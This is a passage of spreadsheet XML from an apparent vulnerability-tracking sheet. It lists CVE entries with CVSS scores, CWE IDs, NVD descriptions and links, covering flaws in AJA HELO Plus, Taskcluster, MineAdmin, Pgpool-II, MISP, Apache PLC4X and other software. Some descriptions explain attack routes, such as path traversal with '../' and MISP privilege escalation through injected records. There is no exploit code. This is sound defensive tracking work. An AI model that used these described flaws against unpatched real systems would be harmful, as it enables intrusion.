        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>AJA HELO Plus firmware before 2.1.7 contains an information disclosure vulnerability that allows unauthenticated attackers to decrypt sensitive diagnostics bundles by exploiting a static AES passphrase embedded in obfuscated form within the firmware. Attackers can reverse engineer the publicly available firmware image to recover the shared passphrase and decrypt diagnostics export bundles retrieved from the unauthenticated diagnostics endpoint on any affected device, exposing highly sensitive server information.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47097</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55094</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-250, CWE-306, CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>Taskcluster is the task execution framework that supports Mozilla's continuous integration and release processes. Prior to version 100.3.0, Taskcluster is vulnerable to unauthenticated RCE on Taskcluster deployments with an anonymous role that exposes the GraphQL endpoint and parses filter arguments using the sift library. This issue has been patched in version 100.3.0.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55094</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55224</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>MineAdmin is a ready-to-use backend management system suitable for quickly building website backends, operation platforms, permission centers, internal management systems, CMS, CRM, OA, ERP and other business applications. Prior to version 3.2.0-alpha.2, the app-store plugin service concatenates unsanitized user-supplied identifier values directly into file system paths. An attacker can use path traversal sequences (e.g., ../) to read, install, or uninstall plugins from arbitrary directories, and potentially execute arbitrary composer commands. This issue has been patched in version 3.2.0-alpha.2.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55224</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76992</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>info@cert.vde.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>The CODESYS Gateway Client allocates memory based on a size field in a gateway response without enforcing an appropriate upper limit. An unauthenticated remote attacker controlling a malicious gateway can exploit this behavior to trigger excessive memory consumption, resulting in a denial-of-service condition thus leading to a total loss of availablity.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76992</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82826</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr"/>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains a vulnerability related to the Cleartext Transmission of Sensitive Information which allows an attacker to eavesdrop on with authentication credentials and sensitive data in transit.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82826</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82828</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>hirt@hitachi.co.jp</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr"/>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Hitachi Coding Software Suite contains an Incorrect Authorization vulnerability that allows an unprivileged user to perform administrator-level operations.
This issue affects Hitachi Coding Software Suite: through 3.3.0.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82828</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92867</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write vulnerability exists in Pgpool-II , which may allow an authenticated attacker to cause abnormal process termination or arbitrary code execution.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92867</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92870</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in Pgpool-II, which may allow an unauthenticated attacker to cause abnormal process termination.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92870</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92871</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>A NULL pointer dereference vulnerability exists in Pgpool-II, which may allow an unauthenticated attacker to cause abnormal termination of the watchdog process.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92871</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102121</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>A form-rendering interface in the Advanced Forms component is reachable without authentication so that published forms can be displayed to anonymous visitors, but it returned more data than the form itself required. Anyone who knew the web address of a published form could potentially retrieve the form owner's Kiteworks account profile, including personal details, along with parts of the deployment's configuration settings; no passwords, authentication tokens, or multi-factor secrets were exposed.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102121</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102454</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has an Arbitrary File Upload vulnerability. Privileged remote attackers can upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102454</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103239</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-862</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>MISP contains a privilege escalation vulnerability in the tag collection creation and editing functionality. The affected actions accepted the full HTTP request payload and passed it to a bulk-association save operation, which writes not only the intended tag collection record but also any associated model data present in the payload.
A user holding the tag editor permission could craft a request that includes additional model data (such as User or Organisation records) alongside the tag collection fields. Because the save operation processed all associated models indiscriminately, the injected sibling records were written to the database, enabling the attacker to modify or create privileged accounts and escalate to site administrator.
Preconditions:
- An authenticated account with the tag editor permission (perm_tag_editor)
- Network access to the MISP instance
Impact:
- Unauthorized creation or modification of User and Organisation records
- Privilege escalation from tag editor to site administrator
Affected versions: &lt; 2.5.48</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103239</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103398</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>OpenSave through 2.4.0 fails to properly validate save paths supplied by paired peers in the manifest request handler. Attackers can specify arbitrary directories outside configured save locations to read and write files through manifest and sync routes.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103398</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97150</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>When converting baserCMS4-style addons to baserCMS5-style ones,
BcAddonMigrator includes "config.php" from the addon, which means the PHP code in the file is executed.
Arbitrary files on the system may be read or deleted by an administrative user.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97150</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102511</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-248, CWE-835, CWE-940</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>Improper Verification of Source of a Communication Channel in the ADS discovery of the Go implementation of Apache PLC4X (PLC4Go) allows an attacker able to send UDP datagrams to the discovering host to redirect subsequent connections to an arbitrary, attacker-chosen address. The discovery result's connection 
address was derived from the AmsNetId claimed in the response body rather than from the datagram's actual source address. One spoofed discovery response can therefore insert an inventory entry pointing at any host, including hosts outside the local network, and an application that connects to discovered devices
will open its ADS session, including any configured route credentials, to that host.
Additionally, discovery listeners in both implementations can be disabled by a single malformed datagram:
- In PLC4Go ADS discovery, a short version block causes a panic that ends the listener for the rest of the discovery call, so legitimate devices answering afterwards are not reported.
- In PLC4J, the ADS and EtherNet/IP discoverers stop on an unhandled exception from a malformed response.
- The PLC4J Modbus discoverer can be made to spin indefinitely, consuming a CPU core, by a scanned host that sends a partial response.
Exploitation requires the application to invoke the discovery API, which is opt-in, and for the connection redirect, to act on the discovered items.
This issue affects Apache PLC4X: PLC4Go from 0.11.0 before 1.0.0; PLC4J ADS and Modbus drivers from 0.10.0 before 1.0.0; PLC4J EtherNet/IP driver from 0.11.0 before 1.0.0. PLC4Go is consumed as the Go module github.com/apache/plc4x/plc4go; versions refer to the corresponding Apache PLC4X releases.
Users are recommended to upgrade to version 1.0.0, which fixes the issue. Version 1.0.0 derives the connection address from the datagram's source address and logs a warning when the claimed AmsNetId disagrees with it.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102511</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10739</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>2505284f-8ffb-486c-bf60-e19c1097a90b</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-23, CWE-59, CWE-73</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>Cato Networks SDP Client for Windows before 6.12.6 allows a local user to delete arbitrary files with SYSTEM privileges via improper validation of a client-supplied SID over a local IPC named pipe.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10739</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94115</t>
        </is>
      </c>
